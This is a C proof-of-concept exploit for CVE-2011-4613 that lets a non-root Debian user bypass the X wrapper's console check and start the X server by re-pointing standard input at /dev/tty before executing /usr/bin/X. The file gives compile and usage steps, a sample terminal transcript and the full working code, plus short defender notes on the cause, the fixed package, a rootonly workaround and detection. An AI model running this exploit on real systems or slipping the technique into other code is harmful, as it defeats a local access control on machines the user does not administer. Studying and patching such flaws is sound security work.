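/* bypass-Xwrapper.c -- X wrapper permission bypass PoC (CVE-2011-4613)
 * -----------------------------------------------------------------------
 *
 * On Debian's default configuration, this trivial PoC allows a non-root
 * user to bypass the X wrapper restrictions and start the X server.
 *
 * Compile: cc bypass-Xwrapper.c -o bypass-Xwrapper
 * Usage:   ./bypass-Xwrapper [:display]
 *
 *   $ tty
 *   /dev/pts/4    // not a real TTY, won't have permissions to start X
 *   $ X :1
 *   X: user not authorized to run the X server, aborting.
 *   $ ./bypass-Xwrapper :1
 *   [X server starts]
 *
 * Tested on Debian 6.0.3 up to date with the xserver-xorg package
 * (version 1:7.5+8).
 *
 * Notes for defenders:
 *   - The only thing this program changes before exec'ing the wrapper is
 *     its standard input, which it re-points at /dev/tty. The transcript
 *     above shows the same user being refused when stdin is /dev/pts/4,
 *     so the wrapper's "console user" decision appears to depend on the
 *     descriptor behind stdin rather than on a verified console device.
 *   - Remediation is the distribution's fixed xserver-xorg package
 *     (<fixed version: see the Debian advisory for CVE-2011-4613>).
 *     Until it is installed, setting allowed_users=rootonly in
 *     /etc/X11/Xwrapper.config denies X server starts to non-root users.
 *   - An X server running for a user who is not logged in on a virtual
 *     console is worth investigating on hosts that still run the
 *     affected package.
 *
 * -----------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 42):
 * wrote this file. As long as you retain this notice you can do whatever
 * you want with this stuff. If we meet some day, and you think this stuff
 * is worth it, you can buy me a beer in return. -V.
 */

/* The header names were missing from this copy of the file; these are the
 * headers the code below requires. */
#include <fcntl.h>   /* open, O_RDONLY */
#include <stdio.h>   /* perror */
#include <unistd.h>  /* dup2, close, execve, STDIN_FILENO */

#define X_WRAPPER "/usr/bin/X"

/*
 * Re-point standard input at /dev/tty, then exec the X wrapper with the
 * optional display argument.
 *
 * argv[1], when present, is passed through unchanged as the wrapper's
 * first argument (e.g. ":1"); without it the wrapper runs with no
 * arguments.
 *
 * Returns 1 if any step fails; does not return when execve succeeds.
 */
int main(int argc, char **argv)
{
    /* Only read argv[1] when it exists; a NULL entry ends the list early. */
    char *opt[] = { X_WRAPPER, argc > 1 ? argv[1] : NULL, NULL };
    /* Explicit empty environment: a NULL envp is a Linux-only extension. */
    char *empty_env[] = { NULL };

    int newstdin = open("/dev/tty", O_RDONLY);
    if (newstdin < 0) {
        perror("open /dev/tty");
        return 1;
    }

    if (dup2(newstdin, STDIN_FILENO) < 0) {
        perror("dup2");
        close(newstdin);
        return 1;
    }

    /* Keep the extra descriptor from being inherited by the wrapper. */
    if (newstdin != STDIN_FILENO) {
        close(newstdin);
    }

    execve(X_WRAPPER, opt, empty_env);

    /* execve only returns on failure. */
    perror("execve " X_WRAPPER);
    return 1;
}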